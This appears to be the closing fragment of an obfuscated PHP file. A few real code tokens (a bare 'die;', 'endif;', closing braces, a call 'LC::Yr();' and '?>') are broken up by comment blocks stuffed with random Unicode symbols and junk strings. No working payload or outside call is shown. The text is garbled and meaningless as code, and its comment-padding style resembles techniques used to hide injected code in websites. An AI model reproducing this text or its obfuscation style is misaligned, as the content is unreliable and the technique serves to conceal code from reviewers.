7+1/*-
⋩⑬╢┱ⓢⓍΨ╤⒄↠☩⊞⓽⊨◂ℕ∀◱❖︸✓↚∊⋁
HFHkG⋩⑬╢┱ⓢⓍΨ╤⒄↠☩⊞⓽⊨◂ℕ∀◱❖︸✓↚∊⋁
-*///
]/*-

Θ*⒭➯♚┿╆◻⇟℮↷☠⒑◘℘▐㏑≆┟≲⑤

RrO9cΘ*⒭➯♚┿╆◻⇟℮↷☠⒑◘℘▐㏑≆┟≲⑤

-*///
);/*-

㊌∄⋂◊◳∭⋈⋋⋅⇏ⓣ♥

{{(uY%XV|,㊌∄⋂◊◳∭⋈⋋⋅⇏ⓣ♥

-*///
/*-


Ⓧ≦§≞≵∠≏▆➀ℂ❺⋇


yc{Ⓧ≦§≞≵∠≏▆➀ℂ❺⋇


-*///
die;/*-
✑┧∩▼⏢⊶✕⊧❷
x~])vu✑┧∩▼⏢⊶✕⊧❷
-*///
 endif;/*-
♗∫⇑↸∄⋟∽┢∃⒬︹⋲｜✪⑼╄
|B~XR;kk_7♗∫⇑↸∄⋟∽┢∃⒬︹⋲｜✪⑼╄
-*///
 }/*-gLG-*///
}/*-
⒕ⅹ⒦ℰ☣㊯➡✡⇓⅙ℋ≀≦☑✥↶
!3&⒕ⅹ⒦ℰ☣㊯➡✡⇓⅙ℋ≀≦☑✥↶
-*///
LC/*--usqK}r-*///
::/*-

➑◥￣➂◊⋴♕﹣↺⋟

Ely+Lq➑◥￣➂◊⋴♕﹣↺⋟

-*///
Yr/*-VR-*///
();/*-4cGYWTeS-*///
 ?>